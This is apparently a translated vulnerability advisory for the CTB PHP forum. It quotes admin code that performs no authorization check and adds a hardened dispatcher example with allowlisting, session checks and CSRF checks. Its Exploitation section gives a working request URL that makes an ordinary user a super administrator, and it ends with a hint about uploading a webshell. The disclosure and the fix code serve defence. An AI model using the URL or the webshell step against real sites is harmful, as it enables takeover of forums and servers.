Beautiful but unsafe CTB
>>> Dedicated to CaoJing <<<
Affected versions:
^^^^^^^
All current versions (1.3 Alpha is the latest release at the time of writing)
Description:
^^^^^^
CTB is an open-source PHP forum developed and maintained by Shiyi Digital <11cn.org>. Because its back-end management files perform no authorization check, an unauthenticated user can directly add a forum super administrator, which puts the forum, and potentially the server, at risk.
Details:
^^^^
CTB is written to a high standard: the code is well organised and pleasant to read. It really is a beautiful program, and its functional modules in particular taught me a lot. Its security, however, is worrying:
Look at the following code:
/admin/main.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
//Collect the GET variables into $return
if( is_array($_GET) ) {
    foreach($_GET as $k=>$v) {
        if( is_array( $_GET[$k]) ) {
            foreach($_GET[$k] as $k2=>$v2) {
                $return[$k] = $v;
            }
        }
    }
}
...
//The module to load is taken straight from the request
$mod = isset($_GET['mod']) ? $_GET['mod'] : $_POST['mod'];
if (!file_exists($mod.".php")) {
    $mod = "mainright";
}
require_once ($mod.".php");
//-----------------------------------------------------------------------
//Initialize class variables
$ctb = new Module;
$ctb->set = $set;
$ctb->tplPath = "./templates";
$ctb->input = $return;
//The admin cookie is only read and handed to the module, never verified
$ctb->sess = isset($_COOKIE["sess_adminname"]) ? $_COOKIE : $_SESSION;
$ctb->execute();
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Nothing here checks whether the caller is a logged-in administrator. Now look at the file that adds administrators:
/admin/systemuser.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
class Module extends CommonClass
//System management module subclass
{
    function execute() {
        //The action is dispatched directly from the request input, with no permission check
        switch($this->input['action']) {
            ...
            case 'addSystemUser':
                $this->addSystemUser();
                break;
            ...
        }
    }
    function addSystemUser()
    {
        //Simple formatting of the input data
        $this->inputCheck("main.php?mod=systemuser&action=showSystemUser");
        //Perform the add operation
        $this->file = "../".$this->set[dataPath]."/users/list.php";
        $systemLine = $this->select(4, $this->input['systemUserName']);
        ....
    }
}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Still no check at all. Have a nice trip!
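The two snippets above show the dispatcher trusting the request for both the module name and the action, and merely copying the admin cookie without checking it. The following is an added example, not CTB's own code, of how the /admin/main.php dispatcher could be hardened. The session keys (admin_id, admin_is_super, csrf), the function names and the WRITE_ACTIONS list are assumptions about what a fixed login module would set; only the module names mainright, systemuser and login come from the original.

```php
<?php
// Added example, not CTB's own code: a hardened form of the dispatcher
// logic quoted above from /admin/main.php. The session keys admin_id,
// admin_is_super and csrf are assumed to be set by a fixed login module
// after it has verified the password.
declare(strict_types=1);

// Closed map of module names to files. Replaces file_exists($mod.".php"),
// so the request can no longer choose which file is included.
const ADMIN_MODULES = [
    'mainright'  => 'mainright.php',
    'systemuser' => 'systemuser.php',
    'login'      => 'login.php',
];

// Actions that change state; they must arrive via POST with a CSRF token.
// (Assumed list; only addSystemUser is named on the page.)
const WRITE_ACTIONS = ['addSystemUser'];

function resolveModule(?string $mod): string
{
    return ADMIN_MODULES[$mod] ?? ADMIN_MODULES['mainright'];
}

// The original only read $_COOKIE["sess_adminname"] and handed it to the
// module; nothing verified that an administrator had logged in, and a
// cookie value is attacker-chosen anyway. Trust only server-side session
// state written by the login handler.
function requireAdminSession(array $session): void
{
    if (empty($session['admin_id']) || empty($session['admin_is_super'])) {
        header('Location: main.php?mod=login', true, 302);
        exit;
    }
}

// Even with the session check, the GET URL from the writeup would still
// work if a logged-in admin could be lured into opening it, so writes are
// POST-only and tied to a per-session token.
function requireWriteRequest(array $server, array $post, array $session): void
{
    if (($server['REQUEST_METHOD'] ?? 'GET') !== 'POST') {
        http_response_code(405);
        exit('Write actions must be POSTed.');
    }
    if (!isset($post['csrf'], $session['csrf'])
        || !hash_equals((string) $session['csrf'], (string) $post['csrf'])) {
        http_response_code(403);
        exit('Bad or missing CSRF token.');
    }
}

// --- Dispatcher ----------------------------------------------------------
session_start();

$requested = $_GET['mod'] ?? $_POST['mod'] ?? null;
$mod = resolveModule(is_string($requested) ? $requested : null);

// The login module is the only one reachable without a session.
if ($mod !== ADMIN_MODULES['login']) {
    requireAdminSession($_SESSION);
}

// Write actions are accepted from POST only, so action=addSystemUser in a
// query string is simply ignored.
$action = $_POST['action'] ?? null;
if (is_string($action) && in_array($action, WRITE_ACTIONS, true)) {
    requireWriteRequest($_SERVER, $_POST, $_SESSION);
}

require_once __DIR__ . '/' . $mod;
// From here the original flow continues: $ctb = new Module; ... $ctb->execute();
```

The order of the checks matters: the allowlist runs before anything is included, the session check runs before any module other than login is loaded, and the POST/CSRF check runs before a write action reaches Module::execute(). The same requireAdminSession() call belongs at the top of each module's execute() as well, so that a module included by some other path is not left unprotected.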
Exploitation:
^^^^^^^
First register an ordinary user:
Login ID: cat
Username: dog
Password: ilikecat
Repeat password: ilikecat
Email: cat@dog.com
Then request the following URL:
http://www.target.com/ctb/admin/main.php?mod=systemuser&systemUserName=dog&systemUserMode=1&action=addSystemUser
Haha, you are now a super administrator. Don't believe me? Request the following URL to log in to the back end:
http://www.target.com/ctb/admin/main.php?mod=login
Admin name: cat
Admin password: ilikecat
Hey... it really works!
Feel like changing the allowed upload file types in the back end and uploading a webshell now? Hmm, I thought so...
Postscript: I also noticed some glaring typos in the CTB code comments, which is rather embarrassing. I hope they get corrected along with this.